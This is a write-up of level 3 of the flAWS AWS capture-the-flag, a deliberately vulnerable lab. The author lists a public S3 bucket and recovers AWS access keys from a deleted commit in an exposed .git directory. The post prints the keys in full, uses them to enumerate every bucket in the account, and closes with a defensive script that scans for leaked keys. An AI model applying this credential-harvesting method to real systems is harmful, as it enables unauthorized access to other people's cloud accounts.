flAWS – AWS CTF – Level 3

Level 3 – Challenge statement:

The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are.

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

"Similar" suggests S3 again, perhaps one with AWS access and secret keys in it.

We know that the bucket name to start from is level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.

Let's first try public access, by browsing to: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

Works! There seems to be a bunch of files in there.

Let's get a cleaner list by using the AWS CLI:

  ~$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --recursive
  2017-09-17 23:12:24         52 .git/COMMIT_EDITMSG
  2017-09-17 23:12:24         23 .git/HEAD
  2017-09-17 23:12:24        130 .git/config
  2017-09-17 23:12:24         73 .git/description
  2017-09-17 23:12:24        452 .git/hooks/applypatch-msg.sample
  2017-09-17 23:12:24        896 .git/hooks/commit-msg.sample
  2017-09-17 23:12:24        189 .git/hooks/post-update.sample
  2017-09-17 23:12:24        398 .git/hooks/pre-applypatch.sample
  2017-09-17 23:12:24       1704 .git/hooks/pre-commit.sample
  2017-09-17 23:12:24       4898 .git/hooks/pre-rebase.sample
  2017-09-17 23:12:24       1239 .git/hooks/prepare-commit-msg.sample
  2017-09-17 23:12:24       3611 .git/hooks/update.sample
  2017-09-17 23:12:24        600 .git/index
  2017-09-17 23:12:24        240 .git/info/exclude
  2017-09-17 23:12:24        359 .git/logs/HEAD
  2017-09-17 23:12:24        359 .git/logs/refs/heads/master
  2017-09-17 23:12:24        679 .git/objects/0e/aa50ae75709eb4d25f07195dc74c7f3dca3e25
  2017-09-17 23:12:24        770 .git/objects/2f/c08f72c2135bb3af7af5803abb77b3e240b6df
  2017-09-17 23:12:25        820 .git/objects/53/23d77d2d914c89b220be9291439e3da9dada3c
  2017-09-17 23:12:25        245 .git/objects/61/a5ff2913c522d4cf4397f2500201ce5a8e097b
  2017-09-17 23:12:25     112013 .git/objects/76/e4934c9de40e36f09b4e5538236551529f723c
  2017-09-17 23:12:25        560 .git/objects/92/d5a82ef553aae51d7a2f86ea0a5b1617fafa0c
  2017-09-17 23:12:25        191 .git/objects/b6/4c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  2017-09-17 23:12:25         42 .git/objects/c2/aab7e03933a858d1765090928dca4013fe2526
  2017-09-17 23:12:25        904 .git/objects/db/932236a95ebf8c8a7226432cf1880e4b4017f2
  2017-09-17 23:12:25         98 .git/objects/e3/ae6dd991f0352cc307f82389d354c65f1874a2
  2017-09-17 23:12:25        279 .git/objects/f2/a144957997f15729d4491f251c3615d508b16a
  2017-09-17 23:12:25        125 .git/objects/f5/2ec03b227ea6094b04e43f475fb0126edb5a61
  2017-09-17 23:12:25         41 .git/refs/heads/master
  2017-02-27 08:14:33     123637 authenticated_users.png
  2017-02-27 08:14:34       1552 hint1.html
  2017-02-27 08:14:34       1426 hint2.html
  2017-02-27 08:14:35       1247 hint3.html
  2017-02-27 08:14:33       1035 hint4.html
  2017-02-27 10:05:16       1703 index.html
  2017-02-27 08:14:33         26 robots.txt

Two interesting bits here, namely authenticated_users.png and the .git directory contents.

Let's browse to have a look at the PNG first: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/authenticated_users.png

OK, that's nothing useful, just an image for the level 3 documentation…

Now let's poke around the .git directory…

Let's make a local copy first:

  $ aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud ~/testtest --recursive

.git/COMMIT_EDITMSG contains the message: “Oops, accidentally added something I shouldn’t have”, which likely means that they made a commit that included AWS keys…

Furthermore, if I run git log I get:

  commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  Author: 0xdabbad00 <scott@summitroute.com>
  Date:   Sun Sep 17 09:10:43 2017 -0600

      Oops, accidentally added something I shouldn't have

  commit f52ec03b227ea6094b04e43f475fb0126edb5a61
  Author: 0xdabbad00 <scott@summitroute.com>
  Date:   Sun Sep 17 09:10:07 2017 -0600

      first commit

This implies there is something in commit f52ec03b227ea6094b04e43f475fb0126edb5a61 that the developer didn’t want there, and removed it in commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526.

Let's have a closer look at commit f52ec03b227ea6094b04e43f475fb0126edb5a61:

        git checkout f52ec03b227ea6094b04e43f475fb0126edb5a61

Then let's look at what file(s) have popped out:

        ~/testtest$ ls
        access_keys.txt  authenticated_users.png  hint1.html  hint2.html  hint3.html  hint4.html  index.html  robots.txt

Oops, there is access_keys.txt. Let's look:

        ~/testtest$ cat access_keys.txt
        access_key AKIAJ366LIPB4IJKT7SA
        secret_access_key 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

Let's make another AWS configure profile using the newly discovered keys:

        ~/testtest$ aws configure --profile flawslevel3
        AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
        AWS Secret Access Key [None]: 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
        Default region name [None]: us-west-2
        Default output format [None]:

Now let’s see if they are valid, and if any interesting S3 buckets are available:

        $ aws s3 ls --profile flawslevel3
        2017-02-19 03:41:52 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
        2017-05-30 00:34:53 config-bucket-975426262029
        2017-02-27 04:06:33 flaws-logs
        2017-02-19 03:40:54 flaws.cloud
        2017-02-24 13:15:42 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
        2017-02-27 02:29:03 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
        2017-02-27 02:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
        2017-02-27 03:49:03 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
        2017-02-27 03:48:40 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
        2017-02-27 04:07:13 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Indeed! There are the bucket names for level 2 to the end.

Let's try browsing to Level 4 publicly: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

Level 4 unlocked.
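
The root cause above is a .git directory uploaded next to the site, whose objects still hold a file deleted in a later commit. As an added example (not part of the original post or of flaws.cloud), here is a pre-upload check that flags a .git directory and scans its loose objects for access-key-shaped strings. The function names are hypothetical, and only loose objects like those in the listing above are read, not packfiles.

```python
import hashlib, re, tempfile, zlib
from pathlib import Path

# Access key ID shape: AKIA (long-term) or ASIA (temporary) plus 16 characters.
KEY_ID = re.compile(rb"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

def write_loose_blob(git_dir, content):
    """Store bytes in git's loose-object format; used to build the sample data."""
    raw = b"blob %d\x00" % len(content) + content
    sha = hashlib.sha1(raw).hexdigest()
    path = Path(git_dir) / "objects" / sha[:2] / sha[2:]
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(zlib.compress(raw))
    return sha

def scan_loose_objects(git_dir):
    """Return (object id, key id) for each key-shaped string found in loose blobs."""
    hits = []
    for obj in sorted((Path(git_dir) / "objects").glob("[0-9a-f][0-9a-f]/*")):
        try:
            raw = zlib.decompress(obj.read_bytes())
        except zlib.error:
            continue  # not a valid loose object
        header, _, body = raw.partition(b"\x00")
        if header.startswith(b"blob "):  # commits and trees carry no file content
            hits += [(obj.parent.name + obj.name, m.group().decode())
                     for m in KEY_ID.finditer(body)]
    return hits

def publish_check(site_dir):
    """Gate to run on a directory before it is synced to a public bucket."""
    git_dir = Path(site_dir) / ".git"
    present = git_dir.is_dir()
    return {"git_dir_present": present,
            "key_hits": scan_loose_objects(git_dir) if present else []}

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:  # constructed sample site
        # AKIAIOSFODNN7EXAMPLE is the placeholder key ID from AWS documentation.
        write_loose_blob(Path(d) / ".git", b"access_key AKIAIOSFODNN7EXAMPLE\n")
        print(publish_check(d))
```

A hit means the key is recoverable from history even if the working tree no longer contains the file, so the key has to be rotated, not just deleted.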
